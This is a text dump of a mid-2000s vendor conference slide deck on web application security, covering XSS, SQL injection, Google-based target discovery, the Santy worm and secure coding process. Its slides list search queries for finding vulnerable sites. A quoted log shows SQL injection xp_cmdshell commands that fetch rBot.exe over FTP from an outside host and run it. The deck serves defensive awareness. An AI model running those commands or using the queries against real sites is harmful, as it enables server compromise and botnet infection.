The Hacking Evolution: New Trends in Web Application Exploits and Vulnerabilities Brian Christian, S

1
The Hacking Evolution New Trends in Web
Application Exploits and Vulnerabilities Brian
Christian, Senior Security Engineer and
Co-Founder, S.P.I Dynamics
2
Agenda

• Part 1 Introduction How on earth did we
  get to this point?
• Part 2 Identifying the Problem How does this
  stuff happen?
• Part 3 Key Application Vulnerabilities
  Past, present and future
• Part 4 Fixing the Problem - Detecting
  application vulnerabilities and implementing a
  security coding process
• Part 5 More information and online resources
• Part 6 QA

3
Part One

• Introduction

• Who We Are - SPI Dynamics in a nutshell
• Application Security -How did we get to this
  point?

4
SPI Dynamics
The Leader In Web Application Security Assessment

• We manufacture and license WebInspect, our
  industry leading web application security
  assessment product, to enterprises, consultants,
  and other institutions, both directly and via
  global partners.
• We own the worlds leading database of web
  application security vulnerabilities,
  SecureBase. SecureBase is updated frequently by
  SPI Labs, our U.S.-based research development
  organization.

5
Web Sites
Simple, single server solutions

• Web Server
• HTML
• CGI

Browser
6
Web Applications
Very complex architectures, multiple platforms,
multiple protocols
Web Services
Database Server Customer Identification Access
Controls Transaction Information Core Business
Data
Application Server Business Logic Content services
Web Servers Presentation Layer Media Store
Wireless
Browser
7
Common Web Applications
8
The Absolute Truth

• All code has bugs regardless of platform,
  language or application.
• From a Microsoft to a Mom and Pops home- brewed
  application, all code has bugs.
• Some bugs are functionality bugs, which are
  discovered by QA.
• Other bugs are security bugs, which largely go
  unidentified.
• As long as functionality is the main objective
  and not security, there will always be
  vulnerabilities in computer applications.

9
Why These Thing Happen
This is all the stuff that your application is
supposed to do.
10
Why Web Application Attacks Occur
The Web Application Security Gap
Application Developers and QA Professionals
Dont Know Security
Security Professionals Dont Know The
Applications
As a Network Security Professional, I dont know
how my companys web applications are supposed to
work so I deploy a protective solutionbut dont
know if its protecting what its supposed to.
As an Application Developer, I can build great
features and functions while meeting deadlines,
but I dont know how to develop my web
application with security in mind.
11
Web Applications Breach the Perimeter
HTTP
INTERNET
IMAP SSH POP3
FTP TELNET
Firewall only allows PORT 80 (or 443 SSL) traffic
from the internet to the web server. Any Web
Server 80
DMZ
Firewall only allows applications on the web
server to talk to application server. Web
Server Application Server
TRUSTED INSIDE
Firewall only
allows application
server to talk to database
server. Application Server
Database
CORPORATE INSIDE
12
Web Applications Invite Public Access
Today over 70 of attacks against a companys
website or web application come at the
Application Layer not the network or system
layer.
- Gartner Group
13
Web Application Risk
Web application incidents cost companies more
than 320,000,000 in 2001.
Forty-four percent (223 respondents) to the 2002
Computer Crime and Security Survey were willing
and/or able to quantify their financial losses.
These 223 respondents reported 455,848,000 in
financial losses.
2002 Computer Crime and Security
Survey Computer Security Institute San
Francisco FBI Computer Intrusion Squad
14
Part Two

• Identifying the Problem

• What are the primary vulnerabilities?
• How and why they occur

15
Web Application Vulnerabilities
Web application vulnerabilities occur in multiple
areas.
Application
Parameter Manipulation Cross-Site Scripting SQL
Injection Buffer Overflow Reverse Directory
Transversal JAVA Decompilation Path
Truncation Hidden Web Paths Cookie
Manipulation Application Mapping Backup
Checking Directory Enumeration
Administration
Extension Checking Common File Checks Data
Extension Checking Backup Checking Directory
Enumeration Path Truncation Hidden Web
Paths Forceful Browsing
Platform
Known Vulnerabilities
16
Cross Site Scripting

• (or XSS)

17
Cross Site Scripting (XSS)

• Cross-site scripting (also know as XSS or CSS)
  occurs when dynamically generated web pages
  display input that is not property validated.
• A user passes input in the form of a parameter to
  the web server.
• The web server returns the user provided input
  back to the user without proper encoding.
• Again, a demonstration!

18
SQL Injection
19
SQL Injection Defined

• SQL injection is a technique for exploiting web
  applications that use client-supplied data in SQL
  queries without stripping potentially harmful
  characters first.
• Allow me to demonstrate!

20
Part Three

• Key Application Vulnerabilities

• Past, Present and Future
• Google Hacking

21
Google Hacking

• More then searching for great pr0n.

22
Google Hacking

• Find vulnerable sites using Google (Old method
  new life)
• Example Search Queries
• filetypemdb inurladmin 180 results
• Filetypexls inurladmin 14,100 results
• ORA-00921 unexpected end of SQL command
  3,470 results
• allintitleNetscape Enterprise Server Home Page
  431 results

23
Google Hacking

• Take this method a step further and use it to
  narrow your attack victims.
• inurlid filetypeasp sitegov 572,000
  results
• inurlid filetypeasp sitecom 7,150,000
  results
• inurlid filetypeasp siteorg 3,240,000
  results
• Use this list as a baseline for identifying SQL
  injection vulnerabilities

24
Google Hacking

• Take this method a step further and use it to
  narrow your attack victims.
• inurlid filetypeasp sitegov 572,000
  results
• inurlid filetypeasp sitecom 7,150,000
  results
• inurlid filetypeasp siteorg 3,240,000
  results
• Use this list as a baseline for identifying SQL
  injection vulnerabilities

25
Google Hacking

• Took 1 hour of coding
• 500 vulnerable sites were found in 1 minute and
  26 seconds

26
Google Hacking
Find next victim
Exploit victim
Exploit victim

• Application Worm

27
The Past, the Present, and the Future of Hacking

• How prolific could this whole scenario be?

28
Where Weve Been The Past

• Since most sites were static HTML, not much to do
  but try to obtain root / admin privileges on the
  machine or deface the website.
• This proved for some great comedy.

29
Where Were At The Present

• Since more dynamic and unique content has been
  added to websites, and users demand even MORE
  functionality so that they can do everything
  electronically, insecure content was added at an
  expedited pace!
• And users and management demand even more!

30
Where Were Going The Future

• Application hacking is becoming more complex as
  applications are becoming more complex. The
  possibilities are endless when it comes down to
  what can you exploit in web applications.
• Take for Instance Application Worms, Web
  Application Worms.

31
Enter the Santy Worm

• Perl.Santy is a worm written in Perl script that
  attempts to spread to Web servers running
  versions of the phpBB 2.x bulletin board software
  Viewtopic.PHP PHP Script Injection Vulnerability
  
• Other systems are not affected. If successful,
  the worm copies itself to the server and
  overwrites the files with the following
  extensions.asp, .htm, .jsp, .php, .phtm, .shtm
• The worm uses the Google search engine to find
  potential new infection targets. Google has now
  implemented blocking Perl.Santy search requests,
  which is expected to greatly reduce the worm's
  ability to propagate and lower the risk of
  further infections.

32
Enter the Santy Worm

• Perl.Santy.A Computer Associates, Santy
  F-Secure, Net-Worm.Perl.Santy.a Kaspersky,
  Perl/Santy.worm McAfee, PHP/Santy.A.worm
  Panda, Perl/Santy-A Sophos, WORM_SANTY.A
  Trend Micro
• UNIX, LINUX, Windows 2000, Windows 95, Windows
  98, Windows Me, Windows NT, Windows Server 2003,
  Windows XP

33
But There Are Even Worse Worms

• New evidence suggests that a new worm has been
  discovered in the wild that takes advantage of
  SQL Injection vulnerabilities.
• A Jan 5th post on seclists.org by Maxime Ducharme
  describes an attack made on his companys
  machines where a hybrid worm (a cross between
  Santy and Randex) was identified in his logs.

34
http//www.google.com/search?num100hlenlras_
qdrallqallinurl3A22viewtopic.php2222
35
Log Entries

• exec MASTER..xp_cmdshell 'mkdir
  systemroot\system32\Macromed\lolx\'
• exec MASTER..xp_cmdshell 'echo open y.y.y.y 21
  systemroot\system32\Macromed\lolx\blah.jkd'
• exec MASTER..xp_cmdshell 'echo USER hahajk
  hahaowned systemroot\system32\macromed\lolx\
  blah.jkd'
• exec MASTER..xp_cmdshell 'echo get rBot.exe
  systemroot\system32\Macromed\lolx\arcdlrde.exe
  systemroot\system32\Macromed\lolx\blah.jkd'
  
• exec MASTER..xp_cmdshell 'echo quit
  systemroot\system32\Macromed\lolx\blah.jkd'
• exec MASTER..xp_cmdshell 'ftp.exe -i -n -v
  -ssystemroot\system32\Macromed\lolx\blah.jkd'
  
• exec MASTER..xp_cmdshell 'del systemroot\system3
  2\Macromed\lolx\blah.jkd' exec
  MASTER..xp_cmdshell 'systemroot\system32\Macrome
  d\lolx\arcdlrde.exe

36
Even Hits Close to Home

• Our RD researcher Bob Auger who runs
  CGISECURITY.NET found suspicious entries in his
  logs.
• He was running FreeBSD.
• So like all good site operators he followed them
  back to the IRC channel that they were using to
  control the worm.
• He was unable to follow them after the 3rd hop
  they made to control the worm.

37
Fact or Fiction? FACT!

• Web Application Worms are the new emerging
  threat.
• We are beginning to see the first generation of
  these emerging threats.
• Current Anti-virus solutions are reactive, not
  proactive.
• Worms could be propagating right now, but very
  few people check their weblogs or scan their
  sites looking for SQL injection.

38
Part Four - Fixing the Problem

• Detecting Application Vulnerabilities
• And Implementing a Secure Coding Process

• Instituting a secure coding process
• How we build the products to make the process work

39
Enterprise-Wide Web Application Security

• Web Application Security testing must be applied
  in all phases of the Application Lifecycle and by
  all constituencies throughout the enterprise
  Auditors, Application Developers, QA and Security
  Operations.

40
Enterprise-Wide Web Application Security

• Application Developers

• Must have clear cut security requirement to
  follow during Development and QA phases
• Need to run automated tests on code during
  Development phase
• Must utilize secure code for re-use
• Require automated testing products that integrate
  into current environment

41
Enterprise-Wide Web Application Security
Quality Assurance Professionals

• Must test applications not only for functionality
  but also for security
• Must test environments for potential flaws and
  insecurities
• Must provide detailed security flaw reports to
  development
• Require automated testing products that integrate
  into current environment

D
D
A
A
Web
Web
Web
Web
Application
Application
Application
Security
Security
S
S
42
Enterprise-Wide Web Application Security
Security Auditors and Risk and
Compliance Officers

• Help define regulatory requirements during the
  Definition phase of the Application Lifecycle
• Assess applications once they are in the
  Production phase to validate compliance
• Must act as resource for what is and is not
  acceptable

D
D
Web
Web
Web
Web
Application
Application
Application
Security
Security
S
Q
S
Q
43
Enterprise-Wide Web Application Security

• Security Operations

• Must continually test application in a real world
  environment to asses impact of ongoing code
  changes
• Must look for all levels of web vulnerabilities
• Platform
• Informational
• Application

D
D
A
A
Web
Web
Web
Web
Application
Application
Application
Security
Security
Q
Q
S
S
Security
44
Part Five

• Other Online Resources

• Websites and mailing lists on the net

45
Websites

• - www.spidynamics.com
• Web Application Security Consortium -
  www.webappsec.org
• CGISecurity.net http//www.cgisecurity.net/
• Open Web Application security Project -
  www.owasp.org
• WebAppSec Mailing list Security Focus

46
Questions?
47
Contact
SPI Dynamics, Inc. 115 Perimeter Center
Place Suite 1100 Atlanta, GA 30346
For a free WebInspectTM 15-day trial download
visit www.spidynamics.com